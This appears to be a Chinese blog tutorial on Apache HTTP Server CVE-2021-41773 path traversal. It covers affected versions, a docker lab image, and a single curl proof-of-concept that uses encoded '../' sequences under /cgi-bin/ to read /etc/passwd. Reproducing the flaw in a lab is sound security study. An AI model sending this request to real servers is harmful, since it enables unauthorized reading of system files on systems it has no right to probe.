常见中间件漏洞(四、Apache合集)

目录

四、Apache

[4.1 CVE-2021-41773](#4.1 CVE-2021-41773)

漏洞简介

影响版本

环境搭建

漏洞复现


四、Apache

4.1 CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
复制代码
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现

1.使用poc

复制代码
curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
tritone16 小时前
在优豆云免费云服务器上搭建与配置Apache的实践笔记
服务器·网络·apache·1024程序员节
Bruce_Liuxiaowei16 小时前
[特殊字符] C&C服务器:网络攻击的指挥中心
运维·服务器·网络安全
-曾牛1 天前
深入浅出 SQL 注入
网络·sql·安全·网络安全·渗透测试·sql注入·盲注
汤愈韬1 天前
IIS服务器
windows·网络安全
-曾牛1 天前
从零到一:XSS靶场 haozi.me 全关卡通关教程(含冷知识汇总)
前端·网络安全·渗透测试·靶场·xss·攻略·靶场教程
黑猫酋长1 天前
Apache Zeppelin:一款强大的数据分析和可视化工具
数据挖掘·数据分析·apache
挨踢攻城1 天前
网络安全 | 如何防御勒索软件?
安全·web安全·网络安全·php·厦门微思网络·防疫勒索软件
belldeep1 天前
网络安全:Apache Druid 安全漏洞
网络安全·apache·druid
Whoami!1 天前
6-1〔O҉S҉C҉P҉ ◈ 研记〕❘ 客户端攻击▸侦查客户端指纹
网络安全·信息安全·客户端侦查
SelectDB1 天前
Apache Doris 4.0 版本正式发布:全面升级 AI 与搜索能力,强化离线计算
数据库·数据分析·apache